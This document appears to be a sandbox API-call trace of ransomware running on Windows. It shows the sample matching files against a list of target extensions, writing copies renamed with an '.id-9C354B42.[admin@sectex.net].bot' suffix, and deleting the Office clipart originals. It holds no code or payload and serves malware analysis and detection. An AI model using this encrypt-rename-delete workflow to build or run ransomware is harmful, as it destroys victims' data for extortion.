	[0161.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF") returned 63
	[0161.159] lstrlenW (lpString=".dbf") returned 4
	[0161.159] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF") returned 63
	[0161.159] lstrlenW (lpString=".1cd") returned 4
	[0161.159] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF") returned 63
	[0161.159] lstrlenW (lpString=".jpg") returned 4
	[0161.159] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF") returned 63
	[0161.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF") returned 63
	[0161.160] lstrlenW (lpString=".doc") returned 4
	[0161.160] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.160] lstrlenW (lpString=".docx") returned 5
	[0161.160] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0161.160] lstrlenW (lpString=".pdf") returned 4
	[0161.160] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.160] lstrlenW (lpString=".xls") returned 4
	[0161.160] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.160] lstrlenW (lpString=".xlsx") returned 5
	[0161.160] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0161.160] lstrlenW (lpString=".ppt") returned 4
	[0161.160] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF") returned 63
	[0161.160] lstrlenW (lpString=".zip") returned 4
	[0161.160] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.160] lstrlenW (lpString=".rar") returned 4
	[0161.160] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.160] lstrlenW (lpString=".bz2") returned 4
	[0161.160] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.160] lstrlenW (lpString=".7z") returned 3
	[0161.160] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF") returned 63
	[0161.160] lstrlenW (lpString=".dbf") returned 4
	[0161.160] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF") returned 63
	[0161.160] lstrlenW (lpString=".1cd") returned 4
	[0161.160] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF") returned 63
	[0161.160] lstrlenW (lpString=".jpg") returned 4
	[0161.160] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.161] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0161.161] lstrlenW (lpString="J0107316.WMF") returned 12
	[0161.161] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107316.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107316.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0161.161] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=11288) returned 1
	[0161.161] CloseHandle (hObject=0x3f0) returned 1
	[0161.161] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107316.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107316.wmf")) returned 0x20
	[0161.161] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107316.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107316.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.162] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107316.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107316.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0161.162] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.162] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.162] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107316.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107316.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0161.163] GetLastError () returned 0x0
	[0161.163] ReadFile (in: hFile=0x3f0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x2c18, lpOverlapped=0x0) returned 1
	[0161.164] WriteFile (in: hFile=0x1b4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x2c20, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x2c20, lpOverlapped=0x0) returned 1
	[0161.165] ReadFile (in: hFile=0x3f0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.165] WriteFile (in: hFile=0x1b4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0161.165] SetEndOfFile (hFile=0x1b4) returned 1
	[0161.166] CloseHandle (hObject=0x1b4) returned 1
	[0161.166] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.166] SetEndOfFile (hFile=0x3f0) returned 1
	[0161.168] CloseHandle (hObject=0x3f0) returned 1
	[0161.169] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107316.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.169] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107316.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107316.wmf")) returned 1
	[0161.169] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107316.WMF") returned 63
	[0161.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107316.WMF") returned 63
	[0161.170] lstrlenW (lpString=".doc") returned 4
	[0161.170] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.170] lstrlenW (lpString=".docx") returned 5
	[0161.170] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0161.170] lstrlenW (lpString=".pdf") returned 4
	[0161.170] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.170] lstrlenW (lpString=".xls") returned 4
	[0161.170] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.170] lstrlenW (lpString=".xlsx") returned 5
	[0161.170] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0161.170] lstrlenW (lpString=".ppt") returned 4
	[0161.170] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107316.WMF") returned 63
	[0161.170] lstrlenW (lpString=".zip") returned 4
	[0161.170] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.170] lstrlenW (lpString=".rar") returned 4
	[0161.170] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.170] lstrlenW (lpString=".bz2") returned 4
	[0161.170] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.170] lstrlenW (lpString=".7z") returned 3
	[0161.170] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107316.WMF") returned 63
	[0161.170] lstrlenW (lpString=".dbf") returned 4
	[0161.170] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107316.WMF") returned 63
	[0161.170] lstrlenW (lpString=".1cd") returned 4
	[0161.170] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107316.WMF") returned 63
	[0161.170] lstrlenW (lpString=".jpg") returned 4
	[0161.171] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107316.WMF") returned 63
	[0161.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107316.WMF") returned 63
	[0161.171] lstrlenW (lpString=".doc") returned 4
	[0161.171] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.171] lstrlenW (lpString=".docx") returned 5
	[0161.171] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0161.171] lstrlenW (lpString=".pdf") returned 4
	[0161.171] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.171] lstrlenW (lpString=".xls") returned 4
	[0161.171] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.171] lstrlenW (lpString=".xlsx") returned 5
	[0161.171] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0161.171] lstrlenW (lpString=".ppt") returned 4
	[0161.171] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107316.WMF") returned 63
	[0161.171] lstrlenW (lpString=".zip") returned 4
	[0161.171] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.171] lstrlenW (lpString=".rar") returned 4
	[0161.171] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.171] lstrlenW (lpString=".bz2") returned 4
	[0161.171] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.171] lstrlenW (lpString=".7z") returned 3
	[0161.171] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107316.WMF") returned 63
	[0161.172] lstrlenW (lpString=".dbf") returned 4
	[0161.172] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107316.WMF") returned 63
	[0161.172] lstrlenW (lpString=".1cd") returned 4
	[0161.172] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.172] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107316.WMF") returned 63
	[0161.172] lstrlenW (lpString=".jpg") returned 4
	[0161.172] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.172] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0161.172] lstrlenW (lpString="J0107328.WMF") returned 12
	[0161.172] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107328.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107328.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0161.605] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=6532) returned 1
	[0161.605] CloseHandle (hObject=0x3f0) returned 1
	[0161.605] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107328.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107328.wmf")) returned 0x20
	[0161.605] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107328.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107328.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.605] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107328.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107328.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0161.605] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.605] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.605] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107328.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107328.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0161.606] GetLastError () returned 0x0
	[0161.606] ReadFile (in: hFile=0x3f0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x1984, lpOverlapped=0x0) returned 1
	[0161.609] WriteFile (in: hFile=0x3c4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x1990, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x1990, lpOverlapped=0x0) returned 1
	[0161.610] ReadFile (in: hFile=0x3f0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.610] WriteFile (in: hFile=0x3c4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0161.610] SetEndOfFile (hFile=0x3c4) returned 1
	[0161.610] CloseHandle (hObject=0x3c4) returned 1
	[0161.611] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.611] SetEndOfFile (hFile=0x3f0) returned 1
	[0161.612] CloseHandle (hObject=0x3f0) returned 1
	[0161.613] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107328.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.613] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107328.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107328.wmf")) returned 1
	[0161.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107328.WMF") returned 63
	[0161.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107328.WMF") returned 63
	[0161.614] lstrlenW (lpString=".doc") returned 4
	[0161.614] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.614] lstrlenW (lpString=".docx") returned 5
	[0161.614] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0161.614] lstrlenW (lpString=".pdf") returned 4
	[0161.614] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.614] lstrlenW (lpString=".xls") returned 4
	[0161.614] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.614] lstrlenW (lpString=".xlsx") returned 5
	[0161.614] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0161.614] lstrlenW (lpString=".ppt") returned 4
	[0161.614] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107328.WMF") returned 63
	[0161.614] lstrlenW (lpString=".zip") returned 4
	[0161.614] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.614] lstrlenW (lpString=".rar") returned 4
	[0161.614] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.614] lstrlenW (lpString=".bz2") returned 4
	[0161.614] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.614] lstrlenW (lpString=".7z") returned 3
	[0161.614] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107328.WMF") returned 63
	[0161.614] lstrlenW (lpString=".dbf") returned 4
	[0161.614] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107328.WMF") returned 63
	[0161.614] lstrlenW (lpString=".1cd") returned 4
	[0161.614] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107328.WMF") returned 63
	[0161.614] lstrlenW (lpString=".jpg") returned 4
	[0161.614] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.614] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107328.WMF") returned 63
	[0161.615] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107328.WMF") returned 63
	[0161.615] lstrlenW (lpString=".doc") returned 4
	[0161.615] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.615] lstrlenW (lpString=".docx") returned 5
	[0161.615] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0161.615] lstrlenW (lpString=".pdf") returned 4
	[0161.615] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.615] lstrlenW (lpString=".xls") returned 4
	[0161.615] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.615] lstrlenW (lpString=".xlsx") returned 5
	[0161.615] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0161.615] lstrlenW (lpString=".ppt") returned 4
	[0161.615] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.615] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107328.WMF") returned 63
	[0161.615] lstrlenW (lpString=".zip") returned 4
	[0161.615] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.615] lstrlenW (lpString=".rar") returned 4
	[0161.615] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.615] lstrlenW (lpString=".bz2") returned 4
	[0161.615] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.615] lstrlenW (lpString=".7z") returned 3
	[0161.615] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.615] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107328.WMF") returned 63
	[0161.615] lstrlenW (lpString=".dbf") returned 4
	[0161.615] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.615] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107328.WMF") returned 63
	[0161.615] lstrlenW (lpString=".1cd") returned 4
	[0161.615] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.615] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107328.WMF") returned 63
	[0161.615] lstrlenW (lpString=".jpg") returned 4
	[0161.615] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.616] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0161.616] lstrlenW (lpString="J0107456.WMF") returned 12
	[0161.616] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107456.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107456.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0161.616] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=3724) returned 1
	[0161.616] CloseHandle (hObject=0x3f0) returned 1
	[0161.616] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107456.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107456.wmf")) returned 0x20
	[0161.616] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107456.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107456.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.617] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107456.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107456.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0161.617] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.617] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.617] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107456.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107456.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0161.617] GetLastError () returned 0x0
	[0161.618] ReadFile (in: hFile=0x3f0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0xe8c, lpOverlapped=0x0) returned 1
	[0161.619] WriteFile (in: hFile=0x3c4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xe90, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xe90, lpOverlapped=0x0) returned 1
	[0161.620] ReadFile (in: hFile=0x3f0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.620] WriteFile (in: hFile=0x3c4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0161.620] SetEndOfFile (hFile=0x3c4) returned 1
	[0161.620] CloseHandle (hObject=0x3c4) returned 1
	[0161.620] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.620] SetEndOfFile (hFile=0x3f0) returned 1
	[0161.625] CloseHandle (hObject=0x3f0) returned 1
	[0161.625] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107456.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.626] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107456.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107456.wmf")) returned 1
	[0161.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107456.WMF") returned 63
	[0161.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107456.WMF") returned 63
	[0161.626] lstrlenW (lpString=".doc") returned 4
	[0161.627] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.627] lstrlenW (lpString=".docx") returned 5
	[0161.627] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0161.627] lstrlenW (lpString=".pdf") returned 4
	[0161.627] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.627] lstrlenW (lpString=".xls") returned 4
	[0161.627] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.627] lstrlenW (lpString=".xlsx") returned 5
	[0161.627] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0161.627] lstrlenW (lpString=".ppt") returned 4
	[0161.627] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.627] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107456.WMF") returned 63
	[0161.627] lstrlenW (lpString=".zip") returned 4
	[0161.627] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.627] lstrlenW (lpString=".rar") returned 4
	[0161.627] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.627] lstrlenW (lpString=".bz2") returned 4
	[0161.627] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.627] lstrlenW (lpString=".7z") returned 3
	[0161.627] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.627] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107456.WMF") returned 63
	[0161.627] lstrlenW (lpString=".dbf") returned 4
	[0161.627] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.627] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107456.WMF") returned 63
